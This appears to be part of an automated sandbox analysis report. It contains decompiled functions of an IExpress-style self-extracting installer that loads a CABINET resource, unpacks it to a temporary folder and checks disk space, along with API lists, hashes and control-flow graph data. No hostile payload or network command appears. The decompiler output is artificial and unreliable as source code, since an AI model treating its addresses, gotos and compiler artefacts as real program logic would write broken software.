                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0x3d9a34 & 0x00000008;
                                                                        							if(( *0x3d9a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0x3d9a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0x3d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0x3d9124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E003D268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0x3d9a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0x3d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0x3d9a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E003D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E003D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E003D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}



































                                                                        0x003d597d
                                                                        0x003d5988
                                                                        0x003d598f
                                                                        0x003d599a
                                                                        0x003d59a6
                                                                        0x003d59a8
                                                                        0x003d59af
                                                                        0x003d59b9
                                                                        0x003d59dd
                                                                        0x003d59e4
                                                                        0x003d59f1
                                                                        0x003d59fe
                                                                        0x003d5a0b
                                                                        0x003d5a13
                                                                        0x003d5a19
                                                                        0x003d5a1b
                                                                        0x003d5ba1
                                                                        0x003d5baf
                                                                        0x003d5bbd
                                                                        0x003d5bd8
                                                                        0x003d5bde
                                                                        0x003d5be3
                                                                        0x003d5bec
                                                                        0x003d5bf0
                                                                        0x003d5bfc
                                                                        0x003d5c02
                                                                        0x003d5c02
                                                                        0x003d5c02
                                                                        0x003d5c04
                                                                        0x003d5c04
                                                                        0x00000000
                                                                        0x003d5c04
                                                                        0x003d5a27
                                                                        0x003d5a3a
                                                                        0x003d5a46
                                                                        0x003d5a48
                                                                        0x003d5a4a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5a64
                                                                        0x003d5a6a
                                                                        0x003d5a6c
                                                                        0x003d5abc
                                                                        0x003d5ac2
                                                                        0x003d5ac9
                                                                        0x003d5aca
                                                                        0x003d5aca
                                                                        0x003d5acc
                                                                        0x003d5acc
                                                                        0x003d5acf
                                                                        0x003d5ad1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5ad3
                                                                        0x003d5ad6
                                                                        0x003d5ad8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5ada
                                                                        0x003d5adc
                                                                        0x003d5add
                                                                        0x003d5add
                                                                        0x003d5ae0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5ae0
                                                                        0x003d5ae2
                                                                        0x003d5ae4
                                                                        0x003d5ae6
                                                                        0x003d5ae6
                                                                        0x003d5ae6
                                                                        0x003d5ae9
                                                                        0x003d5aeb
                                                                        0x003d5af0
                                                                        0x003d5af6
                                                                        0x003d5af8
                                                                        0x003d5af9
                                                                        0x003d5af9
                                                                        0x003d5afb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5afd
                                                                        0x003d5aff
                                                                        0x003d5b00
                                                                        0x003d5b03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5b03
                                                                        0x003d5b05
                                                                        0x003d5b08
                                                                        0x003d5b20
                                                                        0x003d5b27
                                                                        0x003d5b52
                                                                        0x003d5b52
                                                                        0x003d5b5b
                                                                        0x003d5b62
                                                                        0x003d5b6b
                                                                        0x003d5b6d
                                                                        0x003d5b76
                                                                        0x003d5b7d
                                                                        0x003d5b83
                                                                        0x003d5b7f
                                                                        0x003d5b7f
                                                                        0x003d5b7f
                                                                        0x003d5b6f
                                                                        0x003d5b72
                                                                        0x003d5b72
                                                                        0x003d5b85
                                                                        0x003d5b98
                                                                        0x003d5b9e
                                                                        0x003d5b87
                                                                        0x003d5b8f
                                                                        0x003d5b8f
                                                                        0x00000000
                                                                        0x003d5b85
                                                                        0x003d5b29
                                                                        0x003d5b33
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5b35
                                                                        0x003d5b48
                                                                        0x003d5b4a
                                                                        0x00000000
                                                                        0x003d5b4a
                                                                        0x003d5b0f
                                                                        0x003d5b16
                                                                        0x00000000
                                                                        0x003d5b16
                                                                        0x003d5a7c
                                                                        0x003d5a8a
                                                                        0x003d5aa5
                                                                        0x003d5aab
                                                                        0x00000000
                                                                        0x003d59bb
                                                                        0x003d59c0
                                                                        0x003d59c7
                                                                        0x003d59d1
                                                                        0x003d59d6
                                                                        0x003d5c05
                                                                        0x003d5c14
                                                                        0x003d5c14

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003D59A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 003D59AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 003D5A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 003D5A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003D5A64
                                                                        • memset.MSVCRT ref: 003D5A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003D5A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003D5AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 003D5BFC
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
                                                                        • API String ID: 4237285672-0
                                                                        • Opcode ID: e2ee3eb39f2fbdcc7b0a4189f659b78f8672f694c8b4962c7e1b806523345f9d
                                                                        • Instruction ID: 70f950e2302bd2d4cb0075a7ce29ffecc9f7a4d8472765814e6de431ad39ddb9
                                                                        • Opcode Fuzzy Hash: e2ee3eb39f2fbdcc7b0a4189f659b78f8672f694c8b4962c7e1b806523345f9d
                                                                        • Instruction Fuzzy Hash: 147190B290161CAFEB179F64ED85FFA77BCEB48340F0440ABF44596240EA309E848B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 3d4fe0-3d501a call 3d468f FindResourceA LoadResource LockResource 377 3d5161-3d5163 374->377 378 3d5020-3d5027 374->378 379 3d5029-3d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 3d5057-3d505e call 3d4efd 378->380 379->380 383 3d507c-3d50b4 380->383 384 3d5060-3d5077 call 3d44b9 380->384 389 3d50e8-3d5104 call 3d44b9 383->389 390 3d50b6-3d50da 383->390 388 3d5107-3d510e 384->388 392 3d511d-3d511f 388->392 393 3d5110-3d5117 FreeResource 388->393 398 3d5106 389->398 390->398 402 3d50dc 390->402 395 3d513a-3d5141 392->395 396 3d5121-3d5127 392->396 393->392 400 3d515f 395->400 401 3d5143-3d514a 395->401 396->395 399 3d5129-3d5135 call 3d44b9 396->399 398->388 399->395 400->377 401->400 404 3d514c-3d5159 SendMessageA 401->404 405 3d50e3-3d50e6 402->405 404->400 405->389 405->398
                                                                        C-Code - Quality: 77%
                                                                        			E003D4FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0x3d9144 = E003D468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0x3d9140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0x3d8584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0x3d8584, 0x841), 5);
                                                                        				}
                                                                        				_t10 = E003D4EFD(0, 0);
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E003D4CA0, E003D4CC0, E003D4980, E003D4A50, E003D4AD0, E003D4B60, E003D4BC0, 1, 0x3d9148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0x3d9148; // 0x0
                                                                        						_t24 =  *0x3d8584; // 0x0
                                                                        						E003D44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0x3d1140, 0, E003D4CD0, 0, 0x3d9140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0x3d8584; // 0x0
                                                                        					E003D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0x3d9140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0x3d9140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0x3d91d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E003D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0x3d8a38 & 0x00000001) == 0 && ( *0x3d9a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0x3d8584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}
















                                                                        0x003d4fe0
                                                                        0x003d4fe6
                                                                        0x003d4ff9
                                                                        0x003d500d
                                                                        0x003d5013
                                                                        0x003d501a
                                                                        0x003d5163
                                                                        0x003d5163
                                                                        0x003d5020
                                                                        0x003d5027
                                                                        0x003d5037
                                                                        0x003d5051
                                                                        0x003d5051
                                                                        0x003d5057
                                                                        0x003d505e
                                                                        0x003d50a7
                                                                        0x003d50ad
                                                                        0x003d50b4
                                                                        0x003d50e8
                                                                        0x003d50e8
                                                                        0x003d50ee
                                                                        0x003d50ff
                                                                        0x003d5104
                                                                        0x003d5106
                                                                        0x00000000
                                                                        0x003d5106
                                                                        0x003d50cd
                                                                        0x003d50d3
                                                                        0x003d50da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d50dd
                                                                        0x003d50e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5060
                                                                        0x003d5060
                                                                        0x003d5070
                                                                        0x003d5075
                                                                        0x003d5107
                                                                        0x003d5107
                                                                        0x003d510e
                                                                        0x003d5111
                                                                        0x003d5117
                                                                        0x003d5117
                                                                        0x003d511f
                                                                        0x003d5121
                                                                        0x003d5127
                                                                        0x003d5135
                                                                        0x003d5135
                                                                        0x003d5127
                                                                        0x003d5141
                                                                        0x003d5159
                                                                        0x003d5159
                                                                        0x00000000
                                                                        0x003d515f

                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 003D4FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 003D5006
                                                                        • LockResource.KERNEL32(00000000), ref: 003D500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 003D5030
                                                                        • ShowWindow.USER32(00000000), ref: 003D5037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 003D504A
                                                                        • ShowWindow.USER32(00000000), ref: 003D5051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 003D5111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 003D5159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        • Opcode ID: 589046182439d1548d783592bda2ed50a4b139a6e50eeb54473ae403e664cad0
                                                                        • Instruction ID: d2cba7f7dbfe31ca3088c51dd21f5216d515841de65e03c0c6da2e902e2ca1ff
                                                                        • Opcode Fuzzy Hash: 589046182439d1548d783592bda2ed50a4b139a6e50eeb54473ae403e664cad0
                                                                        • Instruction Fuzzy Hash: 5F3108B3642702BBEB235B72FD8AF6737ACA708745F050417F901A6391DAB49C408660
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 406 3d2f1d-3d2f3d 407 3d2f6c-3d2f73 call 3d5164 406->407 408 3d2f3f-3d2f46 406->408 417 3d2f79-3d2f80 call 3d55a0 407->417 418 3d3041 407->418 409 3d2f5f-3d2f66 call 3d3a3f 408->409 410 3d2f48 call 3d51e5 408->410 409->407 409->418 415 3d2f4d-3d2f4f 410->415 415->418 420 3d2f55-3d2f5d 415->420 417->418 424 3d2f86-3d2fbe GetSystemDirectoryA call 3d658a LoadLibraryA 417->424 419 3d3043-3d3053 call 3d6ce0 418->419 420->407 420->409 428 3d2ff7-3d3004 FreeLibrary 424->428 429 3d2fc0-3d2fd4 GetProcAddress 424->429 431 3d3017-3d3024 SetCurrentDirectoryA 428->431 432 3d3006-3d300c 428->432 429->428 430 3d2fd6-3d2fee DecryptFileA 429->430 430->428 442 3d2ff0-3d2ff5 430->442 434 3d3054-3d305a 431->434 435 3d3026-3d303c call 3d44b9 call 3d6285 431->435 432->431 433 3d300e call 3d621e 432->433 446 3d3013-3d3015 433->446 438 3d305c call 3d3b26 434->438 439 3d3065-3d306c 434->439 435->418 450 3d3061-3d3063 438->450 444 3d307c-3d3089 439->444 445 3d306e-3d3075 call 3d256d 439->445 442->428 447 3d308b-3d3091 444->447 448 3d30a1-3d30a9 444->448 456 3d307a 445->456 446->418 446->431 447->448 452 3d3093 call 3d3ba2 447->452 454 3d30ab-3d30ad 448->454 455 3d30b4-3d30b7 448->455 450->418 450->439 459 3d3098-3d309a 452->459 454->455 458 3d30af call 3d4169 454->458 455->419 456->444 458->455 459->418 461 3d309c 459->461 461->448
                                                                        C-Code - Quality: 82%
                                                                        			E003D2F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0x3d8a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E003D5164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E003D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E003D55A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E003D658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0x3da288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0x3d8a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0x3d8a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0x3d8d48 & 0x000000c0;
                                                                        									if(( *0x3d8d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0x3d9a40; // 0x3, executed
                                                                        										_t26 = E003D256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0x3d8a24; // 0x0
                                                                        									 *0x3d9a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0x3d8a38;
                                                                        										if( *0x3d8a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E003D4169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0x3d9a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E003D3BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0x3d8a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E003D3B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E003D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0x3d9124 = E003D6285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0x3d9a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E003D621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0x3d8a24;
                                                                        				if( *0x3d8a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E003D3A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E003D51E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0x3d8a38;
                                                                        				if( *0x3d8a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}




























                                                                        0x003d2f1d
                                                                        0x003d2f28
                                                                        0x003d2f2f
                                                                        0x003d2f3d
                                                                        0x003d2f6c
                                                                        0x003d2f6c
                                                                        0x003d2f71
                                                                        0x003d2f73
                                                                        0x003d3041
                                                                        0x003d3041
                                                                        0x003d3043
                                                                        0x003d3053
                                                                        0x003d3053
                                                                        0x003d2f79
                                                                        0x003d2f80
                                                                        0x00000000
                                                                        0x003d2f86
                                                                        0x003d2f86
                                                                        0x003d2f93
                                                                        0x003d2f9e
                                                                        0x003d2fa0
                                                                        0x003d2fa6
                                                                        0x003d2fb8
                                                                        0x003d2fba
                                                                        0x003d2fbe
                                                                        0x003d2fc6
                                                                        0x003d2fcc
                                                                        0x003d2fd4
                                                                        0x003d2fd6
                                                                        0x003d2fd8
                                                                        0x003d2fe0
                                                                        0x003d2fe6
                                                                        0x003d2fee
                                                                        0x003d2ff0
                                                                        0x003d2ff5
                                                                        0x003d2ff5
                                                                        0x003d2fee
                                                                        0x003d2fd4
                                                                        0x003d2ff8
                                                                        0x003d2ffe
                                                                        0x003d3004
                                                                        0x003d3017
                                                                        0x003d301c
                                                                        0x003d3024
                                                                        0x003d3054
                                                                        0x003d305a
                                                                        0x003d3065
                                                                        0x003d3065
                                                                        0x003d306c
                                                                        0x003d306e
                                                                        0x003d3075
                                                                        0x003d307a
                                                                        0x003d307a
                                                                        0x003d307c
                                                                        0x003d3081
                                                                        0x003d3087
                                                                        0x003d3089
                                                                        0x003d30a1
                                                                        0x003d30a1
                                                                        0x003d30a9
                                                                        0x003d30ab
                                                                        0x003d30ad
                                                                        0x003d30af
                                                                        0x003d30af
                                                                        0x003d30ad
                                                                        0x003d30b6
                                                                        0x00000000
                                                                        0x003d308b
                                                                        0x003d308b
                                                                        0x003d3091
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3093
                                                                        0x003d3098
                                                                        0x003d309a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d309c
                                                                        0x00000000
                                                                        0x003d309c
                                                                        0x003d3089
                                                                        0x003d305c
                                                                        0x003d3061
                                                                        0x003d3063
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3063
                                                                        0x003d302b
                                                                        0x003d3032
                                                                        0x003d303c
                                                                        0x00000000
                                                                        0x003d303c
                                                                        0x003d3006
                                                                        0x003d300c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d300e
                                                                        0x003d3015
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3015
                                                                        0x003d2f80
                                                                        0x003d2f3f
                                                                        0x003d2f46
                                                                        0x003d2f5f
                                                                        0x003d2f5f
                                                                        0x003d2f64
                                                                        0x003d2f66
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2f66
                                                                        0x003d2f4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2f55
                                                                        0x003d2f5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D2F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 003D2FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 003D2FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 003D2FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003D2FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D301C
                                                                          • Part of subcall function 003D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003D2F4D,?,00000002,00000000), ref: 003D5201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-3095882572
                                                                        • Opcode ID: 154b302145a4fb300af673b1007288d605d4811d9304e1c4425f3910ead0fcaa
                                                                        • Instruction ID: 8370b2098c0628199cbf0ed3f6f95994e6bd29e74ae05128db6850668bc13ac6
                                                                        • Opcode Fuzzy Hash: 154b302145a4fb300af673b1007288d605d4811d9304e1c4425f3910ead0fcaa
                                                                        • Instruction Fuzzy Hash: 9141F533A022159BDB33AB71BD46B6A33ADEB54751F010427E942C6391EF74CF84CA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
